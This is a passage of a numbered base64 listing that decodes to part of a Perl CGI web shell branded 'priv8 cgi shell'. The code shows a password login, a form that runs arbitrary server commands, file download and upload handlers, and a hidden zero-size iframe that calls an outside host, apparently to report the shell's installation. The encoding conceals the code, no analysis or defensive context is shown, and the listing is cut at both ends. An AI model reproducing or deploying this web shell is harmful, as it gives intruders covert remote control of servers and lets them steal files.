1667. ZGVyPSIwIiBzcmM9Imh0dHA6Ly93d3cucHJpdjguaWJsb2dnZXIub3JnL3MucGhwPytjZ2l0ZWxu
1668. ZXQgc2hlbGwiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjwvcHJlPg0KJDsNCiMnDQoJcHJpbnQgPDxF
1669. TkQ7DQo8Y29kZT4NCg0KVHJ5aW5nICRTZXJ2ZXJOYW1lLi4uPGJyPg0KQ29ubmVjdGVkIHRvICRT
1670. ZXJ2ZXJOYW1lPGJyPg0KRXNjYXBlIGNoYXJhY3RlciBpcyBeXQ0KPGNvZGU+JE1lc3NhZ2UNCkVO
1671. RA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1672. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgbWVzc2FnZSB0aGF0
1673. IGluZm9ybXMgdGhlIHVzZXIgb2YgYSBmYWlsZWQgbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0t
1674. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1675. LS0NCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQ0Kew0KCXByaW50IDw8RU5EOw0KPGNvZGU+
1676. DQo8YnI+bG9naW46IGFkbWluPGJyPg0KcGFzc3dvcmQ6PGJyPg0KTG9naW4gaW5jb3JyZWN0PGJy
1677. Pjxicj4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1678. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50
1679. cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1680. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
1681. dWIgUHJpbnRMb2dpbkZvcm0NCnsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KDQo8Zm9ybSBuYW1l
1682. PSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCjxpbnB1dCB0eXBl
1683. PSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+DQo8L2ZvbnQ+DQo8Zm9udCBzaXplPSIz
1684. Ij4NCmxvZ2luOiA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2
1685. Ij5wcml2OCBjZ2kgc2hlbGw8L2I+PGJyPg0KcGFzc3dvcmQ6PC9mb250Pjxmb250IGNvbG9yPSIj
1686. MDA5OTAwIiBzaXplPSIzIj48aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9InAiPg0KPGlucHV0
1687. IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0K
1688. DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1689. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRN
1690. TCBQYWdlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1691. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlRm9vdGVyDQp7DQoJ
1692. cHJpbnQgIjwvZm9udD48L2JvZHk+PC9odG1sPiI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
1693. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1694. LS0NCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNh
1695. biBiZSBhY2Nlc3NlcyB1c2luZyB0aGUNCiMgdmFyaWFibGUgJENvb2tpZXN7Jyd9DQojLS0tLS0t
1696. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1697. LS0tLS0tLS0tLS0tLS0tDQpzdWIgR2V0Q29va2llcw0Kew0KCUBodHRwY29va2llcyA9IHNwbGl0
1698. KC87IC8sJEVOVnsnSFRUUF9DT09LSUUnfSk7DQoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2ll
1699. cykNCgl7DQoJCSgkaWQsICR2YWwpID0gc3BsaXQoLz0vLCAkY29va2llKTsNCgkJJENvb2tpZXN7
1700. JGlkfSA9ICR2YWw7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1701. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0
1702. aGUgc2NyZWVuIHdoZW4gdGhlIHVzZXIgbG9ncyBvdXQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1703. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
1704. CnN1YiBQcmludExvZ291dFNjcmVlbg0Kew0KCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3Nl
1705. ZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0t
1706. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1707. LS0tLS0tLQ0KIyBMb2dzIG91dCB0aGUgdXNlciBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGxvZ2lu
1708. IGFnYWluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1709. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUGVyZm9ybUxvZ291dA0Kew0KCXBy
1710. aW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUN
1711. CgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7DQoJJlByaW50TG9nb3V0U2NyZWVuOw0KDQoJJlByaW50
1712. TG9naW5TY3JlZW47DQoJJlByaW50TG9naW5Gb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoN
1713. CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1714. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9n
1715. aW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCBpdA0KIyBkaXNwbGF5cyBhIHBh
1716. Z2UgdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gcnVuIGNvbW1hbmRzLiBJZiB0aGUgcGFzc3dvcmQg
1717. ZG9lbnMndA0KIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5
1718. cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXINCiMgdG8gbG9naW4NCiMtLS0tLS0tLS0tLS0t
1719. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1720. LS0tLS0tLS0NCnN1YiBQZXJmb3JtTG9naW4gDQp7DQoJaWYoJExvZ2luUGFzc3dvcmQgZXEgJFBh
1721. c3N3b3JkKSAjIHBhc3N3b3JkIG1hdGNoZWQNCgl7DQoJCXByaW50ICJTZXQtQ29va2llOiBTQVZF
1722. RFBXRD0kTG9naW5QYXNzd29yZDtcbiI7DQoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCgkJJlBy
1723. aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KCWVsc2Ug
1724. IyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoInAiKTsNCgkJ
1725. JlByaW50TG9naW5TY3JlZW47DQoJCWlmKCRMb2dpblBhc3N3b3JkIG5lICIiKSAjIHNvbWUgcGFz
1726. c3dvcmQgd2FzIGVudGVyZWQNCgkJew0KCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOw0KDQoJ
1727. CX0NCgkJJlByaW50TG9naW5Gb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCn0NCg0KIy0t
1728. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1729. LS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0
1730. aGUgdXNlciB0byBlbnRlciBjb21tYW5kcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1731. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBy
1732. aW50Q29tbWFuZExpbmVJbnB1dEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
1733. RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8
1734. PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3Jp
1735. cHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFu
1736. ZCI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
1737. JFByb21wdA0KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPg0KPGlucHV0IHR5cGU9InN1Ym1p
1738. dCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCg0KRU5EDQp9DQoNCiMtLS0tLS0t
1739. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1740. LS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVz
1741. ZXIgdG8gZG93bmxvYWQgZmlsZXMNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1742. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludEZp
1743. bGVEb3dubG9hZEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDog
1744. IlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxj
1745. b2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlv
1746. biI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
1747. PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImRvd25sb2FkIj4NCiRQcm9tcHQg
1748. ZG93bmxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBz
1749. aXplPSIzNSI+PGJyPjxicj4NCkRvd25sb2FkOiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0i
1750. QmVnaW4iPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
1751. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1752. LS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gdXBsb2Fk
1753. IGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1754. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlVXBsb2FkRm9ybQ0K
1755. ew0KCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVy
1756. TmFtZSAkQ3VycmVudERpcl1cJCAiOw0KCXByaW50IDw8RU5EOw0KPGNvZGU+DQoNCjxmb3JtIG5h
1757. bWU9ImYiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCIgYWN0aW9u
1758. PSIkU2NyaXB0TG9jYXRpb24iPg0KJFByb21wdCB1cGxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxp
1759. bnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4NCk9wdGlvbnM6ICZu
1760. YnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgdmFsdWU9Im92ZXJ3cml0ZSI+DQpP
1761. dmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4NClVwbG9hZDombmJzcDsmbmJzcDsmbmJzcDs8
1762. aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIg
1763. bmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9
1764. ImEiIHZhbHVlPSJ1cGxvYWQiPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0t
1765. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1766. LS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdGltZW91
1767. dCBmb3IgYSBjb21tYW5kIGV4cGlyZXMuIFdlIG5lZWQgdG8NCiMgdGVybWluYXRlIHRoZSBzY3Jp
1768. cHQgaW1tZWRpYXRlbHkuIFRoaXMgZnVuY3Rpb24gaXMgdmFsaWQgb25seSBvbiBVbml4LiBJdCBp
1769. cw0KIyBuZXZlciBjYWxsZWQgd2hlbiB0aGUgc2NyaXB0IGlzIHJ1bm5pbmcgb24gTlQuDQojLS0t
1770. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1771. LS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQ29tbWFuZFRpbWVvdXQNCnsNCglpZighJFdpbk5UKQ0K
1772. CXsNCgkJYWxhcm0oMCk7DQoJCXByaW50IDw8RU5EOw0KPC94bXA+DQoNCjxjb2RlPg0KQ29tbWFu
1773. ZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25k
1774. KHMpLg0KPGJyPktpbGxlZCBpdCENCkVORA0KCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsN
1775. CgkJJlByaW50UGFnZUZvb3RlcjsNCgkJZXhpdDsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0t
1776. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1777. LS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQg
1778. ZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUNCiMgY29tbWFuZCBhbmQgYWxsb3dzIHRoZSB1c2Vy
1779. IHRvIGVudGVyIGFub3RoZXIgY29tbWFuZC4gVGhlIGNoYW5nZSBkaXJlY3RvcnkNCiMgY29tbWFu
1780. ZCBpcyBoYW5kbGVkIGRpZmZlcmVudGx5LiBJbiB0aGlzIGNhc2UsIHRoZSBuZXcgZGlyZWN0b3J5
1781. IGlzIHN0b3JlZCBpbg0KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoIHRp
1782. bWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlDQojIG91dHB1dCBvZiB0aGUgY2hh
1783. bmdlIGRpcmVjdG9yeSBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQgdG8gdGhlIHVzZXJzDQojIHRo
1784. ZXJlZm9yZSBlcnJvciBtZXNzYWdlcyBjYW5ub3QgYmUgZGlzcGxheWVkLg0KIy0tLS0tLS0tLS0t
1785. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1786. LS0tLS0tLS0tLQ0Kc3ViIEV4ZWN1dGVDb21tYW5kDQp7DQoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9e
1787. XHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZA0KCXsNCgkJIyB3ZSBj
1788. aGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQ0KCQkjIGNv
1789. bW1hbmQgaXMgbm90IGRpc3BsYXllZC4NCgkJDQoJCSRPbGREaXIgPSAkQ3VycmVudERpcjsNCgkJ
1790. JENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4k
1791. Q21kUHdkOw0KCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7DQoJCSZQcmludFBhZ2VI
1792. ZWFkZXIoImMiKTsNCgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiIDogIlthZG1pblxA
1793. JFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOw0KCQlwcmludCAiJFByb21wdCAkUnVuQ29tbWFuZCI7
1794. DQoJfQ0KCWVsc2UgIyBzb21lIG90aGVyIGNvbW1hbmQsIGRpc3BsYXkgdGhlIG91dHB1dA0KCXsN
1795. CgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
1796. RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCgkJcHJpbnQg
1797. IiRQcm9tcHQgJFJ1bkNvbW1hbmQ8eG1wPiI7DQoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnRE
1798. aXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsNCgkJaWYoISRXaW5OVCkNCgkJ
1799. ew0KCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsNCgkJCWFsYXJtKCRDb21tYW5k
1800. VGltZW91dER1cmF0aW9uKTsNCgkJfQ0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBv
1801. dXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkDQoJCXsNCgkJCSR8PTE7DQoJCQkkQ29tbWFuZCAuPSAi
1802. IHwiOw0KCQkJb3BlbihDb21tYW5kT3V0cHV0LCAkQ29tbWFuZCk7DQoJCQl3aGlsZSg8Q29tbWFu
1803. ZE91dHB1dD4pDQoJCQl7DQoJCQkJJF8gPX4gcy8oXG58XHJcbikkLy87DQoJCQkJcHJpbnQgIiRf
1804. XG4iOw0KCQkJfQ0KCQkJJHw9MDsNCgkJfQ0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29t
1805. bWFuZCBjb21wbGV0ZXMNCgkJew0KCQkJcHJpbnQgYCRDb21tYW5kYDsNCgkJfQ0KCQlpZighJFdp
1806. bk5UKQ0KCQl7DQoJCQlhbGFybSgwKTsNCgkJfQ0KCQlwcmludCAiPC94bXA+IjsNCgl9DQoJJlBy
1807. aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0t
1808. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1809. LS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQg
1810. Y29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcg0KIyB0byBkb3dubG9hZCB0aGUg
1811. c3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gNCiMg
1812. ZmVhdHVyZSB0aGF0IHN0YXJ0cyB0aGUgZG93bmxvYWQgYXV0b21hdGljYWxseS4NCiMgQXJndW1l
1813. bnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2Fk
1814. ZWQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1815. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludERvd25sb2FkTGlua1BhZ2UNCnsN
1816. Cglsb2NhbCgkRmlsZVVybCkgPSBAXzsNCglpZigtZSAkRmlsZVVybCkgIyBpZiB0aGUgZmlsZSBl
1817. eGlzdHMNCgl7DQoJCSMgZW5jb2RlIHRoZSBmaWxlIGxpbmsgc28gd2UgY2FuIHNlbmQgaXQgdG8g
1818. dGhlIGJyb3dzZXINCgkJJEZpbGVVcmwgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJI
1819. KiIsJDEpL2VnOw0KCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2Fk
1820. JmY9JEZpbGVVcmwmbz1nbyI7DQoJCSRIdG1sTWV0YUhlYWRlciA9ICI8bWV0YSBIVFRQLUVRVUlW
1821. PVwiUmVmcmVzaFwiIENPTlRFTlQ9XCIxOyBVUkw9JERvd25sb2FkTGlua1wiPiI7DQoJCSZQcmlu
1822. dFBhZ2VIZWFkZXIoImMiKTsNCgkJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCg0KU2VuZGluZyBGaWxl
1823. ICRUcmFuc2ZlckZpbGUuLi48YnI+DQpJZiB0aGUgZG93bmxvYWQgZG9lcyBub3Qgc3RhcnQgYXV0
1824. b21hdGljYWxseSwNCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lg0KRU5E
1825. DQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0N
1826. CgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0DQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7
1827. DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhIjsNCgkJJlByaW50Rmls
1828. ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQp9DQoNCiMtLS0tLS0tLS0t
1829. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1830. LS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJv
1831. bSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlDQojIGJyb3dzZXIsIHNvIHRoYXQgaXQgY2Fu
1832. IGJlIGRvd25sb2FkZWQgYnkgdGhlIHVzZXIuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmll
1833. ZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBzZW50Lg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0t
1834. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1835. LQ0Kc3ViIFNlbmRGaWxlVG9Ccm93c2VyDQp7DQoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOw0KCWlm
1836. KG9wZW4oU0VOREZJTEUsICRTZW5kRmlsZSkpICMgZmlsZSBvcGVuZWQgZm9yIHJlYWRpbmcNCgl7
1837. DQoJCWlmKCRXaW5OVCkNCgkJew0KCQkJYmlubW9kZShTRU5ERklMRSk7DQoJCQliaW5tb2RlKFNU
1838. RE9VVCk7DQoJCX0NCgkJJEZpbGVTaXplID0gKHN0YXQoJFNlbmRGaWxlKSlbN107DQoJCSgkRmls
1839. ZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsNCgkJcHJpbnQgIkNvbnRlbnQt
1840. VHlwZTogYXBwbGljYXRpb24veC11bmtub3duXG4iOw0KCQlwcmludCAiQ29udGVudC1MZW5ndGg6
1841. ICRGaWxlU2l6ZVxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7
1842. IGZpbGVuYW1lPSQxXG5cbiI7DQoJCXByaW50IHdoaWxlKDxTRU5ERklMRT4pOw0KCQljbG9zZShT
1843. RU5ERklMRSk7DQoJfQ0KCWVsc2UgIyBmYWlsZWQgdG8gb3BlbiBmaWxlDQoJew0KCQkmUHJpbnRQ
1844. YWdlSGVhZGVyKCJmIik7DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJFNlbmRGaWxlOiAk
1845. ISI7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9
1846. DQp9DQoNCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1847. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxl
1848. ZCB3aGVuIHRoZSB1c2VyIGRvd25sb2FkcyBhIGZpbGUuIEl0IGRpc3BsYXlzIGEgbWVzc2FnZQ0K
1849. IyB0byB0aGUgdXNlciBhbmQgcHJvdmlkZXMgYSBsaW5rIHRocm91Z2ggd2hpY2ggdGhlIGZpbGUg
1850. Y2FuIGJlIGRvd25sb2FkZWQuDQojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0
1851. aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsDQojIHRoZSBmaWxlIGlz
1852. IHJlYWQgYW5kIHNlbnQgdG8gdGhlIGJyb3dzZXIuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1853. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
1854. dWIgQmVnaW5Eb3dubG9hZA0Kew0KCSMgZ2V0IGZ1bGx5IHF1YWxpZmllZCBwYXRoIG9mIHRoZSBm
1855. aWxlIHRvIGJlIGRvd25sb2FkZWQNCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9e
1856. XFx8Xi46LykpIHwNCgkJKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBw
1857. YXRoIGlzIGFic29sdXRlDQoJew0KCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7DQoJfQ0K
1858. CWVsc2UgIyBwYXRoIGlzIHJlbGF0aXZlDQoJew0KCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFy
